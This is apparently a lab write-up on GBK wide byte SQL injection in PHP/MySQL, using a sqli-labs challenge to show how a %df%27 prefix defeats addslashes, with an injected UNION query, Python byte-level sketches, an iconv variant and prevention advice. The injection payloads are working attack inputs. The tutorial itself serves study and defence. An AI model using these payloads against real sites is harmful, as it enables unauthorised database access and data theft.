Recently, I’ve been studying PHP code auditing and came across wide byte injection again. Although I had learned about it a long time ago, I never had the chance to try it. So, I decided to revisit it using sqli-labs. For this analysis, I used Challenge 33, GET – Bypass AddSlashes().

Many websites try to prevent SQL injection by escaping user input with PHP functions such as `addslashes`, `mysql_real_escape_string`, and `mysql_escape_string` (or the `magic_quotes_gpc` setting, which was removed in PHP 5.4). These functions sanitize user input by prefixing special characters with a backslash (`\`). However, under specific conditions, wide byte injection can bypass them.
Wide byte injection is also known as the GBK double-byte bypass.
Let’s use this challenge to demonstrate the injection process and analyze the principle behind it.

Start by testing with a single quote. No error is thrown, but the output shows that the single quote has been escaped. Since this is a wide byte injection, we prepend `%df` to the single quote and send `%df%27`. When the single quote is escaped, a backslash (`\`), URL-encoded as `%5c`, is inserted before it. As a result, the `id` value embedded in the SQL statement becomes:
%df%5c%27
Here’s the key: `%df` consumes `%5c`, and the two bytes together form a single GBK character. Because `%5c` has been absorbed as the second byte of that character, it no longer acts as an escape. MySQL reads `%df%5c` as one ordinary character, so the single quote that follows regains its function as a string delimiter.
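To make the byte-level effect visible, here is a minimal sketch. It uses Python rather than PHP purely to inspect the bytes, and its `addslashes` is a hand-written stand-in for the PHP function (an assumption, not the challenge's code).

```python
def addslashes(data: bytes) -> bytes:
    """Byte-wise stand-in for PHP's addslashes() (illustrative only)."""
    out = bytearray()
    for b in data:
        if b == 0x00:
            out += b"\\0"            # NUL becomes backslash + "0"
        elif b in (0x27, 0x22, 0x5C):
            out.append(0x5C)         # prefix ', " and \ with a backslash
            out.append(b)
        else:
            out.append(b)
    return bytes(out)


raw = b"\xdf'"                       # URL-decoded form of %df%27
escaped = addslashes(raw)            # the backslash lands between 0xdf and the quote
print(escaped.hex(" "))              # df 5c 27

# Group the bytes into characters the way a GBK decoder would.
chars = escaped.decode("gbk")
for ch in chars:
    print(repr(ch), ch.encode("gbk").hex(" "))
```

The loop prints two characters: one two-byte character that has swallowed the backslash, and a bare single quote.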

The resulting SQL error confirms that the single quote is no longer escaped, so injection is possible.

Using a `UNION` query, we can extract some information. However, let’s return to the main topic.
Why does adding `%df` work? It comes down to how MySQL handles a multi-byte connection character set. GBK is a multi-byte encoding in which ASCII characters take one byte and other characters take two. When `%df` is added, it combines with the escape character (`\`, or `%5c`) to form a new character, “運”. The backslash disappears into that character, and the single quote is left unescaped.
As long as the first byte combines with `%5c` to form a valid GBK character, the bypass is successful. Specifically, the first byte must be a GBK lead byte, in the range `0x81` to `0xFE` (that is, greater than 128).
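The claim about lead bytes can be checked empirically. The sketch below assumes Python's built-in `gbk` codec is a reasonable proxy for MySQL's GBK handling; `pairs_with_backslash` is a hypothetical helper name.

```python
def pairs_with_backslash(lead: int) -> bool:
    """True if the two bytes (lead, 0x5c) decode to exactly one GBK character."""
    try:
        return len(bytes([lead, 0x5C]).decode("gbk")) == 1
    except UnicodeDecodeError:
        return False


# Try every possible first byte and keep the ones that absorb the backslash.
leads = [b for b in range(256) if pairs_with_backslash(b)]

print(f"{len(leads)} lead bytes absorb 0x5c, from {min(leads):#x} to {max(leads):#x}")
print(0xDF in leads)   # True: %df works as a prefix
print(0x27 in leads)   # False: an ASCII byte cannot absorb the backslash
```

Any byte in `leads` can replace `%df` in the payload. The exact count depends on which code points the codec defines, so it is not stated here.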
Let’s examine the critical source code for this challenge:

The `check_addslashes` function is used to process the input parameters. Essentially, it’s a wrapper for `addslashes`. Let’s look at its functionality:

In simple terms, it prepends a backslash to each single quote, double quote, backslash, and NUL byte in the input.
Here’s how I understand it, illustrated for clarity:

Wide byte injection arises when PHP sends the query to MySQL and MySQL decodes the incoming bytes using the character set specified by `character_set_client`.
Let’s print the SQL statement:
SELECT * FROM users WHERE id='-1運' union select 1,user(),@@version#' LIMIT 0,1
In MySQL, this executes as:

Why does `%df%5c%27` become `運'` when passed to MySQL?
As mentioned earlier, MySQL decodes the bytes it receives from PHP using the character set specified by `character_set_client`. With that set to GBK, the byte pair `%df%5c` is read as one character, which causes the transformation.
The data transformation process is as follows:
%df%27 ===> (addslashes) ===> %df%5c%27 ===> (GBK) ===> 運'
User Input ==> Filtering Function ==> Code Layer SQL ==> MySQL Request Handling ==> MySQL SQL Execution
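The whole pipeline can be traced end to end with a short sketch. The query template is taken from the printed statement above; `build_query` and the Python `addslashes` are hypothetical stand-ins for the challenge's PHP code, and decoding with Python's `gbk` codec stands in for MySQL reading the statement with `character_set_client=gbk`.

```python
from urllib.parse import unquote_to_bytes


def addslashes(data: bytes) -> bytes:
    """Byte-wise stand-in for PHP's addslashes() (illustrative only)."""
    out = bytearray()
    for b in data:
        if b == 0x00:
            out += b"\\0"
        elif b in (0x27, 0x22, 0x5C):
            out.append(0x5C)
            out.append(b)
        else:
            out.append(b)
    return bytes(out)


def build_query(raw_id: str) -> bytes:
    """User input -> filtering function -> SQL text built in the code layer."""
    user_id = unquote_to_bytes(raw_id)          # what PHP sees in $_GET['id']
    return b"SELECT * FROM users WHERE id='" + addslashes(user_id) + b"' LIMIT 0,1"


payload = "-1%df%27 union select 1,user(),@@version%23"
query = build_query(payload)

print(query)                  # raw bytes sent to MySQL; the backslash is still there
print(query.decode("gbk"))    # the statement as read under GBK
```

The second line of output matches the statement printed earlier: the backslash has been folded into “運”, and the injected `union select` sits outside the string literal.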
mysql_query("SET NAMES gbk");
When this line runs, the three session variables `character_set_client`, `character_set_connection`, and `character_set_results` are all set to GBK.
This is what causes the scenario described above.
What if we use UTF-8 encoding instead? Many websites do this. However, to prevent GBK characters submitted by users from becoming garbled, such websites often convert them to UTF-8 with functions like `iconv` or `mb_convert_encoding` before embedding them into SQL statements.
Preventing Wide Byte Injection
One method is to first call `mysql_set_charset` to set the current character set to GBK, then use the `mysql_real_escape_string` function to sanitize user input.
Alternatively, set `character_set_client` to `binary`.
When MySQL receives data from the client, it assumes the data is encoded in `character_set_client`, converts it to `character_set_connection`, and then to the encoding of the specific table and field. When the query result is generated, it is converted from the table and field encoding to `character_set_results` before being sent back to the client.
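To see why the client character set matters, the sketch below scans a string body for its closing quote under two settings. It is a deliberately simplified model of a SQL lexer, not MySQL's actual implementation; `closing_quote` and `is_gbk_pair` are hypothetical names, and the GBK ranges used are the standard lead (`0x81`-`0xFE`) and trail (`0x40`-`0xFE`, excluding `0x7F`) bytes.

```python
from typing import Optional

BACKSLASH, QUOTE = 0x5C, 0x27


def is_gbk_pair(lead: int, trail: int) -> bool:
    """True if (lead, trail) has the shape of a two-byte GBK character."""
    return 0x81 <= lead <= 0xFE and 0x40 <= trail <= 0xFE and trail != 0x7F


def closing_quote(body: bytes, charset: str) -> Optional[int]:
    """Return the index of the first unescaped quote in a string body, or None."""
    i = 0
    while i < len(body):
        if charset == "gbk" and i + 1 < len(body) and is_gbk_pair(body[i], body[i + 1]):
            i += 2      # one two-byte character; its trail byte is not a backslash
        elif body[i] == BACKSLASH:
            i += 2      # escape sequence: skip the escaped byte
        elif body[i] == QUOTE:
            return i
        else:
            i += 1
    return None


# The bytes that follow id=' once addslashes has run on the payload.
body = b"-1\xdf\\' union select 1,user(),@@version#"

print(closing_quote(body, "gbk"))     # 4
print(closing_quote(body, "binary"))  # None
```

Under GBK the quote at index 4 closes the string, so the rest is parsed as SQL. Under `binary` every byte is taken on its own, the backslash keeps its meaning, and the quote stays escaped.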
Injection Caused by iconv
Using `iconv('utf-8','gbk',$_GET['id'])` can also lead to injection.
Even if `character_set_client` is set to `binary`, the parameter may later be converted to GBK. Injection can then occur with a string like “錦'”.
This is because the GBK encoding of “錦” is `0xe55c`. After escaping and conversion, “錦'” becomes `%e5%5c%5c%27`. Two `%5c` bytes are now present, so the first backslash escapes the second, leaving the single quote unescaped and causing injection.
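The byte arithmetic can be reproduced with a short sketch. It assumes the input is escaped first and converted from UTF-8 to GBK afterwards, which is the order that yields two backslashes; Python's `decode`/`encode` stands in for `iconv`, and `addslashes` and `backslashes_before` are hypothetical helpers.

```python
def addslashes(data: bytes) -> bytes:
    """Byte-wise stand-in for PHP's addslashes() (illustrative only)."""
    out = bytearray()
    for b in data:
        if b == 0x00:
            out += b"\\0"
        elif b in (0x27, 0x22, 0x5C):
            out.append(0x5C)
            out.append(b)
        else:
            out.append(b)
    return bytes(out)


def backslashes_before(data: bytes, index: int) -> int:
    """Count the consecutive backslash bytes immediately before data[index]."""
    n = 0
    while index - n - 1 >= 0 and data[index - n - 1] == 0x5C:
        n += 1
    return n


user_input = "錦'".encode("utf-8")                   # e9 8c a6 27
escaped = addslashes(user_input)                     # e9 8c a6 5c 27
converted = escaped.decode("utf-8").encode("gbk")    # stand-in for iconv('utf-8', 'gbk', ...)

print(converted.hex(" "))                            # e5 5c 5c 27

quote_at = converted.index(b"'")
# An even number of backslashes means they escape each other, not the quote.
print(backslashes_before(converted, quote_at) % 2 == 0)   # True
```

Here the second byte of “錦” is itself `0x5c`, so a byte-wise parser sees an escaped backslash followed by a live quote.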
Summary: Here’s a solution from others:
When programming, always use UTF-8 encoding to avoid wide byte injection. If GBK encoding must be used, take the following precautions:
1. Set `character_set_client=binary`.
2. When using `set names gbk` or `mysql_real_escape_string`, also use `mysql_set_charset` to set the character set.
3. Avoid using `iconv` to convert character encodings.
The best way to patch wide byte injection is:
(1) Use `mysql_set_charset('gbk')` to specify the character set.
(2) Use `mysql_real_escape_string` for escaping.
The principle is that `mysql_real_escape_string` differs from `addslashes` in that it takes the current character set into account, which prevents a lead byte such as `e5` from combining with `5c` into a single wide character. The “current character set” is the one set by `mysql_set_charset`. Both conditions must be met to prevent injection.
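The idea of escaping with the character set in mind can be illustrated as follows. This is a sketch of the general principle only, not the algorithm `mysql_real_escape_string` actually uses: it decodes the input strictly in the connection character set, rejects malformed sequences, and escapes whole characters instead of bytes. `escape_for_charset` is a hypothetical name, and the set of escaped characters is simplified.

```python
def escape_for_charset(data: bytes, charset: str = "gbk") -> bytes:
    """Escape quotes and backslashes per character, not per byte (illustrative)."""
    # Strict decoding raises UnicodeDecodeError on malformed input such as
    # a dangling lead byte followed by a quote.
    text = data.decode(charset)
    out = []
    for ch in text:
        if ch == "\0":
            out.append("\\0")
        elif ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        else:
            out.append(ch)          # multi-byte characters pass through whole
    return "".join(out).encode(charset)


# Well-formed input: the character keeps its own 0x5c trail byte and the
# quote receives a separate backslash.
safe = escape_for_charset("運'".encode("gbk"))
print(safe.hex(" "))                # df 5c 5c 27

# Malformed input: 0xdf followed by a quote is not a valid GBK sequence.
try:
    escape_for_charset(b"\xdf'")
    rejected = False
except UnicodeDecodeError:
    rejected = True
print(rejected)                     # True
```

Read as GBK, `df 5c 5c 27` is “運” followed by an escaped quote, so the string literal stays closed. The `%df%27` payload never reaches the query because it is not valid GBK in the first place.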